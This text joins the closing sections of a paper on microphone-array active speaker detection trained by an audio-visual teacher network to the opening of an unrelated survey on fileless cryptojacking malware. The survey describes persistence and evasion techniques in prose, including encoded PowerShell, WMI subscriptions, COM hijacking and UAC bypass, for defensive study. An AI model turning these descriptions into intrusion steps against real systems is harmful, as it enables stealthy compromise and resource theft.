Yet, it is also \textit{semi-supervised} in that a supervised teacher model, pre-trained on a labeled dataset, automatically annotates unlabeled data to train the student network \cite{Zhu:2009:semiSupervised}.
\subsection{Active Speaker Detection}
Active speaker detection (ASD) is typically tackled as a multi-modal learning problem: e.g.,
via correlation between voice activity and lip
or upper body motion \cite{Cutler:2000:lookWho,Haider:2012:towardsspeaker,Chakravarty2015WhosSA}.
The first, large, annotated dataset for ASD was introduced for the ActivityNet Challenge (Task B) at CVPR 2019: the AVA-ActiveSpeaker dataset \cite{Roth:2020:AVA}.
It has 38.5 hours of face tracks and audio extracted from movies, labeled for voice activity.
Chung \textit{et al.} won the challenge
with an audio-visual model pre-trained on audio-to-video synchronization, performing 3D convolutions \cite{Chung2019NaverAA}.
In 2020, Alcázar \textit{et al.} proposed Active Speakers in Context (ASC) \cite{Alcazar_2020_CVPR}. Instead of compute-intensive 3D convolutions or large-scale audio-visual pre-training, ASC leverages context: in assessing a face's speech activity, it looks at any other faces.
While highly-effective, these audio-visual classifiers rely on prior visual face extraction.
In practice, the speaker can be occluded or facing away from the camera, causing face extraction to fail and degrade overall system performance.
We overcome this using multi-channel audio input: at inference, the model relates voice activity to the speaker's position in the visual frame by combining deep learning with beamforming techniques to optimize the localization accuracy.
ASD can also be tackled with 'traditional' (other than deep learning) solutions. For example, Mohd Izhar \textit{et al.} \cite{izhar:2020:AVtracker} proposed a 3D audio-visual speaker tracker that combines 3D visual detections of the speaker's nose, estimated with the aid of multiple cameras, with 3D audio source detections, estimated using a microphone array and steered response power of the acoustical signal.
Here we present four original contributions: (1) a cross-modal student-teacher approach in which we train the multi-channel audio network with pseudo labels from a pre-trained audio-visual teacher network; (2) spatial feature extraction by beamforming prior to the conventional log-mel-spectrogram input to the audio network;
(3) training and evaluation with an audio-visual dataset captured with multiple co-located cameras and microphone array;
(4) substantial gain in performance by the audio-beamforming student network over all baseline audio networks and the audio-visual teacher network, halving the overall error rate. In light of the excellent results achieved, future benchmark will also compare our solution with other state-of-the-art approaches, e.g. \cite{izhar:2020:AVtracker}.
\section{Self-Supervised Approach} \label{appr}
Our machine-learning pipeline consists of an audio-visual teacher and an audio-only student, as in Fig.\,\ref{block_diagram}.
The teacher network visually detects and tracks faces in the video, then classifies active/inactive frames with the aid of monaural (single-channel) audio.
The horizontal position of the active faces' bounding boxes were used as pseudo labels to train the student network,
which has multi-channel audio input from a microphone array.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/TrainingVisualSupervision_exp09.pdf}}
\caption{Block diagram of the proposed learning pipeline. The `teacher' network, composed of an audio-visual active speaker detector preceded by a face tracker, produces pseudo labels with the speaker's position at each time instance. The `student' audio network is trained to regress the speaker's horizontal position (x) from the `directional' spectrograms achieved after filtering with the spatial beamformer.}
\label{block_diagram}
\end{figure}
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/rig_collage_exp04.pdf}}
\caption{(a) A photo taken from behind one of the two rigs during the dataset capture. (b) Schematic of camera (blue) and microphone (red) positions on the AVA rig.}
\label{AVArig}
\end{figure}
\subsection{Audio-Visual Speaker Dataset}
To provide audio-visual data for training and testing, spoken scenes were recorded in our studio by two twin Audio-Visual Array (AVA) rigs designed for media production.
Each AVA rig
has a 16-element microphone array and 11 cameras fixed on a flat perspex sheet,
as in Fig.\,\ref{AVArig}.
Each camera captures 2448$\times$2048p video frames at 30\,fps.
Audio is sampled at 48 kHz, 24 bits.
The microphone array has a horizontal aperture of 450\,mm
and vertical aperture of only 40\,mm, thus
prioritizing horizontal spatial resolution.
Horizontally, the microphones are log-spaced for broad frequency coverage from 500\,Hz to 8\,kHz.
Although our pipeline requires a single video feed with the microphone array, capturing multiple views allows us extend the audio network's training via an additional task: choosing from which view we want the speaker to be localized.
Hence, we append a one-hot vector denoting the selected view to the audio input, which provides data augmentation through variations in the camera perspective.
The captured scenes are excerpts from Shakespeare's `Romeo and Juliet' played by two actors, seen in Fig.\,\ref{AVArig} (a).
Captured scenarios, 20 sequences in total of 15--40\,s duration, included monologue, dialogue and physical interaction with occlusion.
As each sequence was captured by 22 cameras in all, the dataset provided over 2.5 hours of video data.
\subsection{Teacher Network}
The teacher network has two main parts: a face tracker and an ASD classifier.
To generate the face tracks (i.e., stack of face crops), the SeetaFaceEngine2 face detector was first applied to each video frame \cite{wu2016Seeta}.
It proved effective in detecting faces in challenging conditions, such as partial occlusion or faces in profile, and fast (it processed 2448$\times$2048p frames at 10$^+$\,fps).
The per-frame detections were tracked over time based on bounding-box intersection over union (IoU) across adjacent frames.
Gaussian temporal smoothing was applied to the bounding box corners.
For ASD, we trained the publicly-available ASC model \cite{Alcazar_2020_CVPR} on the AVA Active Speaker dataset \cite{Roth:2020:AVA}.
In \cite{Alcazar_2020_CVPR}, the \textit{i-th} frame is classified observing the previous and following \textit{n} frames, input as a stack of 2$n$+1 frames.
Experiments on our data performed best with stacks of 5 frames ($n$\,=\,2).
Once trained, the model processed our dataset to automatically detect the active speakers.
The horizontal positions of the speakers' bounding-box centers yielded pseudo labels to supervise the training of the student audio network.
\subsection{Student Network}
The student network is trained to tackle active speaker detection as a simultaneous classification and regression problem: active/inactive classification, and regression of the speaker's position when speech activity is detected.
The network is trained using active and silent segments.
To localize moving vehicles, Gan \textit{et al.} \cite{Gan2019SelfSupervisedMV} fed their network directly with magnitude mel-spectrograms of the left and right stereo microphone signals, neglecting phase information and emphasizing level-difference cues.
With microphone arrays, we argue that fine time-difference cues are key for direction-of-arrival (DoA) estimation.
So, our solution spatially filters the array's audio by steering its directivity over \textit{N} horizontal so-called `look' directions.
The output \textit{N} audio signals give magnitude mel-spectrograms,
stacked as an \textit{N-}channel image input to the student network.
The advantages of this solution are twofold: time-difference cues are kept, and the beamformer's steered outputs help the network to converge.
\textbf{Beamformer:} Using the beamforming toolbox by Galindo \textit{et al.} \cite{galindo:2020:microphone}, a set of beamforming weights was computed to spatially filter the array signals over 15 look directions. We employed the super-directive beamformer (SDB) with white noise gain constraint as it preserves excellent quality of the target sound with good suppression of external noises \cite{galindo:2020:microphone}.
The designed frontal look directions are equally spaced along the horizon by 5° from one another in the range $\pm$30°, plus two additional directions at $\pm$45°. These positions were approximated by a Lebedev sampling grid, which has nearly uniform distribution over the sphere but is non-uniform in the azimuth-elevation representation seen in Fig.\,\ref{look_dir}.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/Model_exp_06.pdf}}
\caption{Schematic representation of our `student' audio network.}
\label{audio_network}
\end{figure}
\textbf{Model:} The audio network takes as input a stack of 15 log-mel-spectrograms computed from the 15 beamformer output signals.
The network is depicted in Fig.\,\ref{audio_network}.
It has 7 convolutional layers that progressively decrease the time-frequency resolution of the spectrograms and increase the number channels until a 1$\times$1$\times$512 feature vector is achieved.
Then, the feature vector passes through 4 fully connected layers.
The resulting vector is concatenated with an 11-dimensional one-hot vector encoding the camera view with which to perform the regression.
The reason for performing the concatenation at this stage of the network is to first reduce the length of the feature vector to approximate that of the one-hot vector.
Lastly, 2 fully-connected layers generate a 2D output vector representing the speaker's horizontal position and the confidence.
Each convolutional layer is followed by a ReLU layer to introduce non-linearity, dropout of 20\%, and batch normalization.
Similar to \cite{Krizhevsky:2012:AlexNet}, after the first, second, fifth and sixth layers, max pooling layers with stride 2 are applied to rapidly decrease the feature map dimensionality.
The output coordinates and confidence are normalized in the range [0, 1] by means of a Sigmoid function.
The per-frame detections are then temporally filtered using Gaussian smoothing to provide temporal coherence.
\textbf{Loss Function} To train our model, we employ a sum-squared error-based loss function.
The loss is composed of two terms, a regression loss and a confidence loss:
\begin{equation}
Loss=\mathbbm{1}\textsubscript{src}(x-\hat{x})^2+(C-\hat{C})^2
\label{loss_function}
\end{equation}
where \textit{\^{x}} and \textit{x} are respectively the predicted and ground truth positions of the speaker along the horizontal axis of the video frame, normalized in the range [0, 1], while \textit{\^{C}} and \textit{C} are the predicted and ground truth confidences.
While the ground truth position of the speaker is simply provided by the teacher network, the confidence is computed as follows:
\begin{equation}
C =
\begin{cases}
1-|(x-\hat{x})| & \text{if source is active}\\
0 & \text{otherwise}\\
\end{cases}
\end{equation}
In doing so, the confidence is forced to be low in the absence of speech activity, and to estimate how close the coordinate prediction is to the source.
The farther the coordinate prediction from the source, the lower the confidence is forced to be.
This means that \textit{\^{C}} represents the confidence that a source is in the model's predicted position.
The term $\mathds{1}$\textsubscript{src} is 0 for silent frames and 1 for active, i.e., in the absence of speech the network is penalized by the confidence loss only.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/lookDir_exp01.pdf}}
\caption{The 15 look directions employed. Blue circles represent the ideal steering angles; Red crosses are the Lebedev sampling grid approximations.}
\label{look_dir}
\end{figure}
\section{Experiments} \label{exp}
\subsection{Data Preparation}
To train the audio network we use short segments of audio (audio frames) temporally centered on the visual time frame of interest.
To increase the reliability of the positive face tracks detected by the teacher network, we manually screened the positive pseudo labels in order to remove potential false positives. In such a way, we ensure that all the active frames used in training are correct. However, we can not ensure that the negatives are actually true, i.e. that they were classified as silent because of the effective absence of speech or simply because the speaker's face was not detected. Therefore, we used the AVA rigs to capture a silent audio sequence containing only the studio noise floor. The audio frames employed for training are sampled either from the teacher network's active detections or from the silent sequence to ensure the training samples are reliable. The silent sequence was captured to be long enough to approximately match the number of speech frames and therefore avoid bias between activity and inactivity.
In total we collated a training set with over 140k frames from 17 of the 20 dataset's sequences and silent segments.
The remaining 3 unseen sequences were used only at inference, for testing. To perform an impartial evaluation, we manually labeled the ground-truth bounding-box locations of the speaker's head in each of the 22 camera views, to yield 66 test sequences.
\subsection{Implementation Details}
As in \cite{vasudevan:2020:semanticobject}, gains were computed for each channel of the array to set their the root mean square (RMS) magnitude to a desired value and achieve level calibration.
The audio frames used to train the network are 5 visual frames long, i.e., 166\,ms. Therefore, likewise it was done for the training of the teacher network, to evaluate the \textit{i-th} frame, we consider an audio chunk that starts from the frame $i-2$ and finishes at frame $i+2$, (8000 audio samples). We extract the audio chunk of interest from each of the 15 signals achieved with the beamformer. A short-time Fourier transform with a Hann window of size 512 samples is applied at hop steps of 125 samples to generate a spectrogram for each look direction, discretizing the 8000-sample audio chunks into 64 temporal bins. The frequency resolution of the spectrograms is down-sampled over 64 mel-frequency bins and finally, the logarithm operation is applied. Stacking together the 15 log-mel-spectrograms, the result is a 64$\times$64 image with 15 channels. To leverage and amplify the differences between silent and active frames at each frequency band, we normalize the network's inputs following a frequency-wise normalization criterion. In the first place, the mean of the pixels' values is computed for each frequency bin over the entire training set. Then, each pixel value in normalized by subtracting its frequency bin's mean, and dividing by the global standard deviation. We found that this normalization approach enhances the performance in comparison to the traditional normalization approach based on the global mean and global standard deviation.
We trained our audio network for 25 epochs using batches of 64 images, Adam optimizer, and a learning rate of \num{2e-4}.
\subsection{Evaluation Metrics}
A prediction is considered to be positive, i.e. the network predicts the presence of speech, when the predicted confidence is above a threshold and a positive detection is considered to be true when the localization error is within a predefined tolerance.
We compute the precision and recall rates by varying the confidence threshold from 0\% to 100\%. Since, at inference, the network's confidence tends to be either very high or very low, we build the precision-recall curves by sampling the thresholds from a Sigmoid-spaced distribution. This provides more data points for high and low confidence values. The common object detection metric average precision (AP) was then computed. The AP is determined following the approach indicated by the Pascal VOC Challenge \cite{Everingham:2015:pacalVOC}, which consists in: 1) compute a monotonically decreasing version of the precision-recall curve by setting the precision for the recall \textit{r} equal to the maximum precision obtained for any recall \textit{r'$\geq$r}, and 2) compute the AP as the numerical integration of the curve, i.e. the area under the curve (AUC).
According to human auditory spatial perception \cite{Strybel:2000:MinimumAA}, the minimum audible angle (MAA) is 2°. Therefore, we set a tolerance for spatial misalignment between the prediction and the GT speaker's position of $\pm$2° along the azimuth, which corresponds to $\pm$89 pixels if projected onto the image plane\footnote{All conversions from pixels to degrees and vice-versa are performed with pre-computed camera-calibration data.}.
However, in many practical audio-visual applications, the human brain tends to tolerate greater misalignments as it integrates audio and visual signals as a unified object (ventriloquism effect \cite{Stenzel:2018:PTC,Berghi:2020:IEEEVR}).
For this reason, the AP is also reported at $\pm$5° tolerance ($\pm$222 pixels) to provide greater flexibility.
The F1 score to find the optimal compromise between precision and recall is computed too. Additionally, the average distance (aD) between the active detections and the GT locations is reported in both pixel and angle units.
Finally, regardless of the regression accuracy, we measure the amount of correct classifications between active and silent frames achieved by setting the confidence at 0.5.
\begin{table}[tb]
\caption{Method results in average distance (aD), average precision (AP) and F1 score at 89 ($\pm$2°) and 222 ($\pm$5°) pixel tolerances.}
\begin{center}
\begin{tabular}{c|c|c|c|c|c}
\hline
\textbf{Method}&\textbf{aD}&\textbf{AP@2°}&\textbf{F1@2°}&\textbf{AP@5°}&\textbf{F1@5°} \\
\hline
Teacher &\textbf{\hl{10p {(0.2°)}}} & 61.1\% & 0.68 & 61.2\% & 0.68 \\
Mono & \hl{318p {(7.2°)}} & 5.1\% & 0.19 & 23.0\% & 0.44\\
Stereo & \hl{196p {(4.4°)}} & 19.3\% & 0.39 & 52.6\% & 0.67\\
w/out BF & \hl{145p {(3.3°)}} & 36.2\% & 0.54 & 71.5\% & 0.79\\
3 look dir & \hl{86p {(1.9°)}} & 53.9\% & 0.69 & 82.7\% & 0.88\\
7 look dir & \hl{77p {(1.7°)}} & 59.0\% & 0.72 & 86.6\% & 0.90\\
Ours & \hl{76p {(1.7°)}} & 66.6\% & 0.79 & 86.2\% & 0.91\\
Ours + tc & \hl{68p {(1.5°)}} & \textbf{70.5\%} & \textbf{0.81} & \textbf{87.1\%} & \textbf{0.92}\\ \hline
\end{tabular}\vspace{-3ex}
\label{tabBaselines}
\end{center}
\end{table}
\subsection{Baseline Methods} \label{baseln}
We evaluate our approach performance against a variety of different baselines to motivate its design choices.
\textbf{Teacher network:} We process the test set sequences with the teacher network. Note that while our approach estimates only the horizontal position of the speaker, the teacher provides the bounding box coordinates of the speaker's face. Therefore, for a fair comparison, we consider only the x coordinate of the center of the predicted bounding box.
\textbf{W/out BF:} To prove the benefit introduced by the use of the beamformer, we train a model to perform the same task using directly the log-mel-spectrograms of the 16 microphones signals. The model used is identical but the input images have 16 channels rather that 15.
\textbf{Stereo:} Similarly to the `W/out BF' baseline, we do not apply spatial filtering to the audio signal. In this case, we use the log-mel-spectrograms achieved from just 2 of the microphones. We use the microphones spaced at $\pm$88.3 mm distance from the center of the array, which is consistent with the ORTF stereo microphones capturing technique. In this case, the inputs of the network are 2-channels images.
\textbf{Mono:} We only use the log-mel-spectrogram of the central microphone signal. This allows to observe what the model can learn from monaural sound and no additional spatial cues.
\textbf{3 \& 7 look dir:} The audio network is trained with a fewer number of look directions to observe the effects of a coarser input spatial resolution. The `3 look dir' baseline employs only the look directions at 0° and $\pm$20°; while for the `7 look dir' the directions at 0°, $\pm$15°, $\pm$30° and $\pm$45° are used.
\textbf{Ours + tc:} We smooth the per-frame consecutive detections achieved by means of a Gaussian temporal filter that provides temporal coherence.
\section{Results} \label{res}
\subsection{Method Comparisons}
Experimental results show that our approach considerably outperforms the other baselines. In Fig.~\ref{precision_recall} are reported the precision-recall curves achieved with the different baselines, while the metrics results are reported in Tab.~\ref{tabBaselines}.
\textbf{Ours vs. Teacher network:} As appreciable from Fig.~\ref{precision_recall}, our approach produces a remarkable improvement in recall rate, meaning that it detects the speakers more easily compared to the teacher network. The teacher network's poorer recall rate is caused by its impossibility to detect speakers when their face is not visible to the face detector, e.g., when the actors are not facing the camera. This problem does not persist with our audio network. Contrariwise, the spatial resolution achievable by the visual modality produces a higher maximal precision, although overall our approach has greater AP.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/azimuth_over_time_exp02.pdf}}
\caption{Example of detections over time from one camera view on a test sequence. Pixel coordinates provided also in angles for reference.}
\label{azimuthOverTimeMonologue}
\end{figure}
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/precision_recall_89_exp02.pdf}}
\caption{Method comparison of precision versus recall at 89-pixel tolerance. Dots mark the highest F1 scores.}
\label{precision_recall}
\end{figure}
\textbf{W/ vs. W/out Beamformer:} The employment of the beamformer introduces an important improvement over the direct use of the audio channels, with an increment in AP of 30.4 percentage points at 89p tolerance and 14.7 percentage points at 222p. Benefits at both the precision and recall rates are noticeable and the average distance is decreased by \hl{69p ({1.6°} shorter)}. Even with fewer look directions the benefit is remarkable, meaning that the beamformer provides the overall system with a higher localization accuracy. The advantage of additional look directions is less appreciable with a larger tolerance (222p) where the AP resulted slightly higher with 7 look directions than with 15.
\textbf{16 Channels vs. Stereo vs. Mono:} The availability of a higher number of microphones improves the network's spatial resolution in that it provides additional spatial cues. The employment of 16 microphones rather than only 2 decreases the aD error from \hl{196p {(4.4°)} to 145p {(3.3°)}} and, as a result, the precision and recall rates are higher. Nevertheless, the Stereo configuration still proved to deliver a decent degree of spatial accuracy which might be useful in situations with limited availability of microphones. As expected, the Mono baseline produced a poor AP, although its aD error might appear to be relatively low. This is caused by the network trying to minimize the regression error by predicting the speaker's position to always be towards the center of the visual frames.
\subsection{Spatial Resolution}
The results show that the spatial resolution increases when more look directions are employed, however, the improvement is not remarkable. On average, \hl{10p} improvement from 3 to 15 look directions, and only 1p improvement from 7 to 15 look directions.
The spatial resolution can be further refined by temporally filtering the per-frame detections in order to provide temporal coherence as defined in \ref{baseln}. After the filtering, the average distance error is only \hl{68p {(1.5°)}}.
Also, it would be hard to keep the error below this value considering that a certain degree of approximation is already introduced by the spatial offset between the mouth and center of the bounding box itself. As expected, the spatial resolution achievable with the teacher network is very high thanks to the visual modality.
\subsection{Speech Activity Detection}
In correctly classifying the presence of speech, all the baselines are approximately equally highly performant: the `w/out BF' baseline classified 94,7\% of the frames correctly, and both our approach and Stereo 95.7\%.
In fact, to accomplish such a task the use of beamformers and multiple audio channels results in being superfluous and potentially redundant. Indeed the highest classification performance was achieved by the Mono baseline with 96.6\% correctness. By observing the false positives detections, it is possible to notice that they are mainly caused by external noises such as foot steps and actors' breath in prior to the speech segment, meaning that the network learned to distinguish between the presence of general activity and silence, while the manual annotations only reported the actual speech segments. This behavior can be explained by the fact that the silence frames used in training came from a completely silent capture of the room noise floor. If a more selective model is needed, it can be accomplished by including unwanted non-speech sounds in the silent track.
\section{Conclusion} \label{concl}
In this work, we proposed a self-supervised learning approach to solve the active speaker detection and localization problem using a microphone array. To generate the pseudo labels used to train our model from newly collected data, we adopted a pre-trained audio-visual teacher network. We proposed a new strategy for combining spatial filtering with deep learning techniques and evaluated our system against several different baselines, with a favorable outcome. Future experiments will explore different beamformers, look directions, and network architectures, as well as benchmark our approach with other state-of-the-art solutions and datasets.
\section*{Acknowledgment}
Thanks to Marco Volino, Mohd Azri Mohd Izhar, Hansung Kim, Charles Malleson and actors for audio-visual recordings.
\bibliographystyle{IEEEtran}
| 2024-02-18T23:40:18.651Z | 2022-03-08T02:39:45.000Z | algebraic_stack_train_0000 | 2,018 | 4,868 |
|
proofpile-arXiv_065-9892 | \section{Introduction}
With the highly skilled attackers \cite{smith2020moment}, and zero-day vulnerabilities, the number and complexity of sophisticated cyberattacks are increasing \cite{burt2020}. Ransomware \cite{lee2021study} and unauthorized cryptomining \cite{wei2021deephunter} are the most common threats in the wild \cite{olaimat2021ransomware}. Recently, ransomware and cryptojacking incidents have been observed under an emerging threat: ``Fileless malware`` that is ten times more successful than the other file-based attacks \cite{mansfield2017fileless}.
The main efficiency of this technique is to run malicious scripts on memory (RAM) injecting adversary codes to legit processes in order to bypass sophisticated but traditional signature-based and behavior-based anti-malware detection systems \cite{bulazel2017survey}. The scripts leave no trace on the disk \cite{mansfield2017fileless} as an anti-forensics technique \cite{saad2019jsless} while providing full control to remote Command and Control (C2) servers \cite{smelcer2017rise}. Furthermore, even if the original malicious scripts are identified and removed, they remain operational in victim endpoints.
A remarkable feature of fileless threats is to become stealthy, which means it uses legitimate built-in tools that cannot be blocked, such as PowerShell, WMI (Windows Management Instrumentation) subscriptions, and Microsoft Office Macros \cite{margosis2011windows}. It is also called a living-off-the-land attack that attackers do not need to install any other tools during this attack. Moreover, less forensics evidence and exploitation of known tools like PsExec.exe or Adfind.exe \cite{barr2021survivalism} make detections harder and investigations challenging \cite{baldin2019best}.
In 2017, 77\% of detected attacks were coming from more sophisticated fileless attack techniques \cite{kumar2020emerging,Ponemon2017}. In 2019, Trend Micro reported that they blocked more than 1.4 million fileless events \cite{trendmicro1}. In 2020, fileless malware detections increased nearly 900\% because most of the threat actors have discovered its effectiveness compared with the traditional ways \cite{WatchGuard2020,panker2021leveraging}.
Notably, the open-source attack frameworks, such as PowerShell Empire, PowerSploit, play a significant role \cite{piet2018depth} in the complex fileless malware attacks \cite{nelson2020open}. These frameworks are distributed as open-source tools to create and simulate the attack phases for nefarious purposes as well as penetration testing. The open-source tools also provide abilities on elevating privileges or spreading laterally across victim networks. Some of these penetration test tools (Red Team tools) are Mimikatz, Cobalt Strike, Metasploit \cite{panchal2021review}. Especially, Cobalt Strike and Metasploit were the fileless malware threat sources for a quarter of all malware servers in 2020 \cite{cimpanu2021cobalt, vandetecting}. There was a 161 percent increase happened in 2020 in the usage of CobaltStrike Framework \cite{threatpost2021}. In the first half-year of 2021, most attacks have been observed with the Cobalt Strike attack tool \cite{malwarebytes2021}.
In the use of fileless malware, the threat actors, specifically APT groups, try to steal data, disrupt operations, destroy infrastructures, or use the computer resources as seen in the cryptojacking incidents \cite{varlioglu2020cryptojacking}. Unlike most traditional methods, threat actors are slow in fileless attacks, specifically during lateral movements on networks to avoid the detection methods \cite{mwiki2019analysis}. Therefore, attacks can take days, weeks, or sometimes months that cause a persistent data breach or resource usage as experienced in cryptojacking.
Cryptojacking is the unauthorized use of a computing device to mine cryptocurrency \cite{Hong2018}, \cite{Eskandari2018},~\cite{varlioglu2020cryptojacking}. In a cryptojacking attack, a victim may suffer from the lack of computer performance, hardware (CPU, GPU, and battery) declining, and high electricity bills.
\begin{figure*}
\centering
\includegraphics[width=0.7\textwidth]{keyword_google.png}
\caption{The popularity rate of fileless malware and cryptojacking words on Google.}
\label{fig1Label}
\end{figure*}
There are three types of cryptojacking attacks.
\begin{enumerate}
\item \textbf{In-browser Cryptojacking}: runs with cryptojacking websites that contain hidden mining scripts \cite{tekiner2021sok}.
\item \textbf{In-host Cryptojacking}: runs on operating systems and disks (ROM) as malicious programs \cite{tekiner2021sok}.
\item \textbf{In-memory only Cryptojacking}: that runs on memory (RAM) only with malicious scripts \cite{tremdmicromonero2019}.
\end{enumerate}
Although in-browser cryptojacking attacks declined after Coinhive (in-browser crypto-mining service) shutdown in March 2019, in-memory cryptojacking is one of the most prevalent threats in the wild \cite{olaimat2021ransomware}. It was observed 25\% more cryptocurrency mining malware in 2020 over 2019 levels \cite{CNBC2021}. With the rise of fileless malware and cryptojacking incidents, today, cybercriminals have merged these attacks into a dangerous combo: fileless cryptojacking malware \cite{Constantin2019}. Even though fileless malware and cryptojacking attacks have started independently and both attack types gained popularity in 2017, as shown in Fig.~\ref{fig1Label}, cryptojacking incidents were observed with fileless malware attacks after 2019 \cite{Constantin2019}.
In this paper, we attempt to provide an understanding of the emerging fileless cryptojacking. The second goal is to fill a gap in the literature that there is no sufficient research on this new problem. Finally, we present a novel threat hunting-oriented DFIR approach with the best practices derived from academic research and field experience. To the best of our knowledge, this paper is one of the first comprehensive research attempts on "fileless cryptojacking."
\section{Fileless Malware Workflow}
Malware analysis relies on the analysis of executable binaries, but in fileless malware, there is no actual executable stored on a disk to inspect \cite{bulazel2017survey}. It stays and operates in the Random Access Memory (RAM) and removes the footprints to increase the difficulty of removal \cite{mansfield2017fileless}. It is also called non-malware, Advanced Volatile Attack (AVT) \cite{afianian2019malware}, or Living-off-the-Land (LotL) attack as threat actors use legitimate tools, processes, benign software utilities, and libraries during an attack \cite{saad2019jsless}. These are built-in native and highly reliable Windows applications such as Windows Management Instrumentation (WMI) subscriptions, PowerShell, Microsoft Office Macros \cite{margosis2011windows}. Thus, it is stealthy, and it is almost impossible to block legitimate built-in tools. In other words, the operating system attacks itself.
However, fileless malware is a broad term, and some attacks can combine file-based attacks with fileless malware. Also, some phases of the attack chain can be fileless while others can store files on a disk \cite{Microsoft82021}. Moreover, in a ransomware incident, the attack was completed by writing the files into the disk. However, the delivery, execution, and propagation phases are still fileless \cite{saad2019jsless}.
Based on this concept, fileless malware threats can be classified into two types:
\begin{itemize}
\item \textbf{Type I}: \textbf{Fully Fileless Malware}: It runs no file on disk, but all activities are observed on memory. Threat actors can send malicious network packets to install backdoors that reside in the only kernel memory. \cite{Microsoft82021}.
\item \textbf{Type II}: \textbf{Fileless Malware with Indirect File Activity}: It does not directly write files on disk, but threat actors can install a PowerShell command within the WMI repository by configuring a WMI filter for persistency. Even though the malicious WMI object theoretically exists on a disk, it does not touch the file system on the disk. Therefore, it is considered a fileless attack because, according to Microsoft \cite{Microsoft82021}, "\textit{the WMI object is a multi-purpose data container that can not be detected and removed}".
\end{itemize}
Below, the workflow of fileless threat is explained.
\subsection{Delivery}
In a fileless threat, if there is no network-based vulnerability exploitation, the initial entry vector may be a file. However, the payload is always fileless. Thus, these kinds of attacks are still considered as fileless. \cite{Microsoft82021}.
Specifically, spear phishing is usually distributed in the fileless malware attacks \cite{baldin2019best} such as Trickbot \cite{rendell2019understanding}. The email attachments loads scripts directly into the memory \cite{kumar2020emerging} without even touching the local file systems \cite{celik2019behavioral}. ``Office Macros" are convenient to deceive users \cite{afreen2020analysis}.
After 2020, attackers started to use the Cobalt Strike framework to create a remote control with complete command execution from inside Microsoft Office Word and Excel files that come from phishing emails \cite{Darktrace2021}. Malicious macros can create scheduled tasks downloading files camouflaged as ".jpg" or ".png" or ".dll" files from the attackers' command and control servers (C2s) as seen in the Fig.~\ref{fig2} \cite{Cyberreason2017}. The content of the camouflaged files can actually be obfuscated with PowerShell payload scripts.
\begin{figure}
\centering
\includegraphics[width=\linewidth]{schtaskfromword.PNG}
\caption{Sample malicious macro to create a scheduled task from a word file in a phishing email.}
\label{fig2}
\end{figure}
On the other hand, zero-days such as Log4j or SolarWinds Serv-U \cite{CSW2021} vulnerabilities are exploited to execute remote codes in fileless attacks. Even though patches have been released, some may miss the updates, or the updates may not work at first. Successful exploitation would give attackers the ability to gain privileges, view, and change data \cite{baldin2019best}. Recent exploitations have been observed with the Cobalt Strike framework with created effective backdoors and scheduled tasks \cite{Microsoft2021, CSW2021}.
Unhardened attack surfaces such as public-facing RDP, FTP, SSH, MS-SQL ports can also be exposed to attacks that can lead unauthorized accesses to deploy fileless malware \cite{panchal2021review}.
Last, a malicious website or a legitimate compromised website can contain some form of malicious code such as JavaScript \cite{saad2019jsless}, iFrames, and cross-site scripting. Especially since browsers run scripts automatically, the attack does not require any user interaction aside from them just visiting the site. This specific mode of infection makes detection very difficult. A malicious script from a malicious website can run an encoded PowerShell script to conduct fileless malware by loading executables and libraries into a legitimate Windows process \cite{TrendMicro2017-1}. For instance, Saad et al. \cite{saad2019jsless} demonstrated how to develop fileless malware (JSless) for web applications using Javascript features with HTML5. Five well-known anti-malware systems could not detect it \cite{saad2019jsless}.
\subsection{Deployment}
In this phase, the deployment vector may be a file such as executables, DLLs, LNK files, and scheduled tasks \cite{Microsoft82021}. However, the payload is always fileless on memory. The Base64 encoded PowerShell commands or VBScript (with Wscript) \cite{saad2019jsless} play a significant role in injecting legitimate processes on Windows or autostart services inside autorun registry keys as WMI event subscriptions\cite{Microsoft82021}. A legitimate process can get the endpoint connected to a C2 server under an outgoing traffic \cite{afianian2019malware}. Attackers can also exploit sysadmin tools to deploy fileless malware such as PSEXEC, MSHTA, BITSAdmin, CertUtil, and Msiexec. This can also be a second step after a script-based deployment. Fileless trojans can distribute and reinject themselves into other processes \cite{sihwail2021effective}.
\subsection{Persistent Mechanism}
Even if malicious scripts are identified and removed, or the endpoint is rebooted, a persistent mechanism can keep malware operational. This gives attackers time to escalate privileges and move laterally on networks. Specifically, PowerShell, WMI Subscriptions, Scheduled Tasks, and Registry Hive are used to create a persistent mechanism \cite{boranaassistive}, \cite{afianian2019malware}. When fileless malware is deployed, a legitimate Windows process can write an executable (mostly base64-encoded) code into the registry \cite{kumar2020emerging} to run an encoded command to execute the payload during reboot. Common persistence frameworks are Armitage, Empire, and Aggressor Scripts. Those scripts help attackers exploit the Windows Task Scheduler \cite{afreen2020analysis}. For example, a registry key including a PowerShell command may control a malicious scheduled task \cite{boranaassistive}.
In some attacks, a registry keyname is used to forward the process to another keyname that associates with the first keyname as the "TreatAs" feature to execute the payload. The "TreatAs" is actually a registry key that allows one CLSID (Class ID) to be spoofed by another CLSID. In this way, a COM object can be redirected to another COM object. This technique is also called COM (The Microsoft Component Object Model) Hijacking. COM is a system in Windows to provide interaction between software components through the operating system. COM hijacking is used for persistency and evasion by inserting executable malicious code in place of legitimate software through the Windows Registry under normal system operation \cite{Mitre2021COM}.
Additionally, the WMI event filter can execute a malicious command after an uptime period \cite{bulazel2017survey, kumar2020emerging}. For example, Empire \cite{9092030}, an open-source PowerShell post-exploitation framework, has a feature to create a permanent WMI event subscription \cite{PowerShellempire}.
\subsection{Privilege escalation}
As threat actors are able to gain higher-level administrator privileges, they can move in the network and execute remote commands successfully. Bypassing User Account Control (UAC) is one of the common methods \cite{MitreUAC, loman2019ransomware}. In order to gain local admin or domain admin privileges, they can hijack legitimate Microsoft programs and processes that have an inherently auto-elevate feature which means unprivileged users can access and run these processes with elevated privileges.
